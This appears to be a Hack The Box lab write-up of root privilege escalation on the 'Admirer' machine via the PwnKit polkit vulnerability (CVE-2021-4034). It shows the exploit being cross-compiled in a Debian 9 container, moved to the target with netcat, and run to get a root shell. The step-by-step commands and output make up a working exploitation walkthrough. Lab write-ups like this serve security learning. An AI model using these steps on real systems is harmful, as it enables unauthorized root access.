CVE-2021-4034
peas discovered that the target system is vulnerable to cve-2021-4034
a vulnerability, which was classified as critical, has been found in polkit (version now known). This issue affects some unknown processing of the file /usr/bin/pkexec. The manipulation with an unknown input leads to a access control vulnerability. Using CWE to declare the problem leads to CWE-284. The software does not restrict or incorrectly restricts access to a resource from an unauthorized actor. Impacted is confidentiality, integrity, and availability.
exploit (pwnkit)
Exploit available online
waldo@admirer:~$ gcc ; cc ; make
-bash: gcc: command not found
-bash: cc: command not found
-bash: make: command not foundSince the target system does not have compilers installed, the exploit must be compiled remotely
Docker Exploit Development
the target system is devuan ascii, a fork of Debian
according to wikipedia, Devuan ASCII is based on Debian 9 "Stretch"
┌──(kali㉿kali)-[~/archive/htb/labs/admirer]
└─$ docker run -it --entrypoint "/bin/bash" --name admirer debian:9
unable to find image 'debian:9' locally
9: Pulling from library/debian
8372a04f222b: Pull complete
digest: sha256:c5c5200ff1e9c73ffbf188b4a67eb1c91531b644856b4aefe86a58d2f0cb05be
status: Downloaded newer image for debian:9
root@bccd0ee7b79a:/# Starting a Docker container with a Debian 9 image
root@bccd0ee7b79a:/# ldd --version
ldd (Debian GLIBC 2.24-11+deb9u4) 2.24
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.glibc version matching is verified
root@bccd0ee7b79a:/# apt update -y ; apt install -y net-tools netcat nano gcc gcc-multilib make git ; cd rootInstalling necessary packages
root@bccd0ee7b79a:~# git clone https://github.com/berdav/CVE-2021-4034.git ; cd CVE-2021-4034
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56
unpacking objects: 100% (92/92), done.Downloading the exploit package
root@bccd0ee7b79a:~/CVE-2021-4034# make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true gconv_path=./pwnkit.so:.Compile
root@bccd0ee7b79a:~/CVE-2021-4034# cd ../ ; tar -czf CVE-2021-4034.tar.gz CVE-2021-4034
root@bccd0ee7b79a:~# nc 10.10.10.187 2222 < CVE-2021-4034.tar.gz
waldo@admirer:~$ nc -nlvp 2222 > CVE-2021-4034.tar.gz
listening on [any] 2222 ...
connect to [10.10.10.187] from (UNKNOWN) [10.10.16.8] 47520Delivery complete
Exploitation
waldo@admirer:~$ tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034Opening up the compiled exploit package
waldo@admirer:~/CVE-2021-4034$ ./cve-2021-4034
# whoami
whoami
root
# hostname
hostname
admirer
# ifconfig
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.10.187 netmask 255.255.254.0 broadcast 10.10.11.255
inet6 fe80::250:56ff:feb9:1993 prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::250:56ff:feb9:1993 prefixlen 64 scopeid 0x0<global>
ether 00:50:56:b9:19:93 txqueuelen 1000 (Ethernet)
RX packets 1956575 bytes 348510939 (332.3 MiB)
RX errors 0 dropped 18 overruns 0 frame 0
TX packets 1816878 bytes 1007385879 (960.7 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1 (Local Loopback)
RX packets 7356 bytes 726520 (709.4 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 7356 bytes 726520 (709.4 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0System Level Compromise